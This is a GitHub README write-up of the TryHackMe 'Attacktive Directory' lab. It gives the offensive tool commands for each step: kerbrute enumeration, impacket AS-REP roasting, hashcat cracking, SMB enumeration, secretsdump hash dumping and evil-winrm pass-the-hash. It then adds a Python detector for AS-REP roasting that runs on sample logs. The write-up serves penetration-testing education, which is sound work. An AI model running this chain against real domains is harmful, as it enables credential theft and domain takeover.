cybe07/Active-Directory-Labs

GitHub: cybe07/Active-Directory-Labs

A hands-on project focused on learning Active Directory attack chains, addressing how to reproduce and master AD penetration testing paths in a lab environment.

Stars: 0 | Forks: 0

# 🛡️ Attacktive Directory Write-up

## 📌 Overview

* **Room:** Attacktive Directory
* **Domain:** spookysec.local
* **Objective:** Compromise the domain and retrieve all flags

This lab demonstrates a full Active Directory attack chain, leveraging Kerberos misconfigurations, credential exposure, and privilege escalation techniques to achieve Domain Admin access.

## 📑 Table of Contents

* [🌐 Initial Enumeration](#-initial-enumeration)
* [🧑‍💻 User Enumeration](#-user-enumeration)
* [🔐 AS-REP Roasting](#-as-rep-roasting)
* [🔓 Hash Cracking](#-hash-cracking)
* [📂 SMB Enumeration](#-smb-enumeration)
* [🔐 Credential Extraction](#-credential-extraction)
* [🧠 Privilege Escalation](#-privilege-escalation)
* [🔑 Pass-the-Hash](#-pass-the-hash)
* [🏁 Flags](#-flags)
* [📚 Key Takeaways](#-key-takeaways)

## 🌐 Initial Enumeration

```
nmap -sC -sV -p-
```

### 🔍 Findings:

* 88 → Kerberos
* 389 → LDAP
* 445 → SMB
* 139 → NetBIOS
* 3389 → RDP

✔️ Confirmed Active Directory Domain Controller

📸 ![Nmap](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/nmap.png)

## 🧑‍💻 User Enumeration

```
kerbrute userenum --dc -d spookysec.local userlist.txt
```

### 🔍 Result:

* Valid domain users discovered

📸 ![Kerbrute](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/kerbrute.png)

## 🔐 AS-REP Roasting

```
impacket-GetNPUsers spookysec.local/ -usersfile user.txt -no-pass -dc-ip
```

### 🎯 Result:

* Retrieved AS-REP hash

📸 ![ASREP](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/asrep.png)

## 🔓 Hash Cracking

```
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
```

### 🎯 Result:

* Password recovered

📸 ![Hashcat](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/hashcat.png)

## 📂 SMB Enumeration

```
smbclient -L /// -U
```

### 🔍 Shares Found:

* ADMIN$
* backup
* IPC$
* NETLOGON
* SYSVOL

📸 ![SMB](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/smb.png)

## 🔐 Credential Extraction

```
echo "" | base64 -d
```

### 🎯 Result:

* Found credentials for backup user

📸 ![Decode](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/decode.png)

## 🧠 Privilege Escalation

```
impacket-secretsdump spookysec.local/backup:@
```

### 🎯 Result:

* Dumped NTLM hashes:
  * Administrator
  * svc-admin
  * backup

📸 ![Secretsdump](https://raw.githubusercontent.com/cybe07/Active-Directory-Labs/main/screenshots/secretsdump.png)

## 🔑 Pass-the-Hash

```
evil-winrm -i -u Administrator -H
```

### 🎯 Result:

* Domain Admin access achieved

## 🏁 Flags

| User          | Location |
| ------------- | -------- |
| Administrator | Desktop  |
| svc-admin     | Desktop  |
| backup        | Desktop  |

⚠️ Flags hidden for ethical reasons

## 🔥 Attack Chain

```
Nmap → Kerbrute → AS-REP → Hashcat → SMB → Decode → Secretsdump → PtH → DA
```

## 📚 Key Takeaways

* Kerberos misconfigurations can lead to credential exposure
* AS-REP roasting enables offline password attacks
* Base64 encoding is not secure
* Backup privileges can expose the entire domain
* Pass-the-Hash avoids the need to crack passwords

## 🚀 Author

* 💻 cybe07
* 🔗 https://github.com/cybe07
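The AS-REP roasting takeaway above, seen from the domain controller's side: an added example (not part of this repository) that flags Kerberos TGT requests issued without pre-authentication in constructed Event ID 4768 records, and checks the userAccountControl bit that causes it. Account names, client addresses and the event text are constructed sample data.

```python
# Added example, not from the original write-up: detection logic for AS-REP
# roasting. The Event ID 4768 records below are constructed sample data.
import re

# userAccountControl bit that makes an account AS-REP roastable
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample events, "Key: Value" lines, blank line between events
SAMPLE_EVENTS = """
Event ID: 4768
Account Name: svc-admin
Client Address: ::ffff:10.10.14.7
Pre-Authentication Type: 0
Ticket Encryption Type: 0x17

Event ID: 4768
Account Name: backup
Client Address: ::ffff:10.10.10.5
Pre-Authentication Type: 2
Ticket Encryption Type: 0x12

Event ID: 4768
Account Name: Administrator
Client Address: ::ffff:10.10.14.7
Pre-Authentication Type: 0
Ticket Encryption Type: 0x12
"""

def parse_events(text):
    """One dict per event; events are separated by a blank line."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        events.append(fields)
    return events

def asrep_roast_candidates(events):
    """4768 events issued without pre-authentication (type 0). Returns
    (account, client, etype); etype 0x17 (RC4) is what hashcat mode 18200 cracks."""
    return [(e["Account Name"], e["Client Address"], e["Ticket Encryption Type"])
            for e in events
            if e.get("Event ID") == "4768" and e.get("Pre-Authentication Type") == "0"]

def is_preauth_disabled(user_account_control):
    """True when DONT_REQ_PREAUTH is set, the misconfiguration behind the attack."""
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)
```

Accounts with the bit set produce type-0 requests on every normal logon too, so the etype column is what separates a roasting attempt (RC4 requested) from routine AES traffic.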
Tags: Active Directory, AS-REP Roasting, Credential Extraction, CTF learning, CTI, DNS resolution, DOS header wiping, Hash Cracking, Kerberos protocol, Pass-the-Hash, PE loader, Plaso, Privilege Escalation, SMB Enumeration, SMB shares, TryHackMe, internal network penetration, domain controller, domain penetration, hands-on lab, password cracking, emulator, digital forensics, ticket attacks, cybersecurity learning, reverse engineering tools